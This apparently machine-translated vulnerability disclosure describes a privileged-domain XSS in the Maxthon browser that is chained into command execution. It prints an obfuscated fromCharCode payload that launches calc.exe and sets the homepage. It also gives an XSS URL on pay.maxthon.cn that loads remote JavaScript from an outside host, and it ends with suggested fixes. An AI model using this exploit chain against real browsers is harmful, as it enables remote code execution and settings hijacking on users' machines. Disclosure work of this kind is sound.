Ao you browser Command Execution Vulnerability (privileged domain xss)

Ao you browser Command Execution Vulnerability (privileged domain xss)

Ao you browser has a defect in its design. It has a privileged domain XSS, which can be used with APIs for command execution.

Detailed description:

Keep up with Daniel and dig holes!
-------------------------------
0x00 privileged domain XSS
-------------------------------
Some privileged domains are found in MxWebkit. dll:

When you view the mx: // res/error/danger_site.htm privileged domain, the URL Processing is available:
 

Access mx: // res/error/danger_site.htm? Javascript: alert (document. domain), found to support javascript protocol:
 

-------------------------------

0x01 vulnerability Exploitation

-------------------------------

In the privileged domain, you need to trigger the click vulnerability. Because the new browser version limits the calling of the mxCall function in external, you can use the local region to load the privileged domain, the clickjacking method is restricted.

To increase the probability of recruitment, you can use the xss in the maxthon.cn domain to set the privileged domain containing XSS as the homepage.

In maxthon.cn, you can call maxthon objects to modify browser configurations, such as proxies, home pages, and shortcut keys.

The code for setting the homepage is as follows:

Test. js:

url = "mx://res/error/danger_site.htm?javascript：eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))";maxthon.browser.config.ConfigManager.set("maxthon.config","browser.general.startpage",url);

The following is missing an XSS, which can be scanned by the following means:
 

http://pay.maxthon.cn/bill99.php?gname=maxthon/">

Use XSS to load external JS and execute the home page setting code. Here, XSS is very boring and sets the length limit. However, you can use the anonymous Function Method to execute our code and use Function (URL )() and \ u2028 run super-long JS Code:

http://pay.maxthon.cn/bill99.php?gname=maxthon%22/%3E%3Csvg/onload=Function(document.URL)()%3E#【\u2028】var s=document.createElement("script");s.src="http://1.exploitcat.sinaapp.com/test.js";document.body.appendChild(s);

-------------------------------

0x02 Effect

-------------------------------

Open the browser again and you will see that the privileged domain page with XSS is set as the home page. The command execution result is as follows:
 

Proof of vulnerability:

Solution:

1. Fixed the XSS of maxthon.cn and the privileged domain;

2. More fine-grained access control over maxthon objects.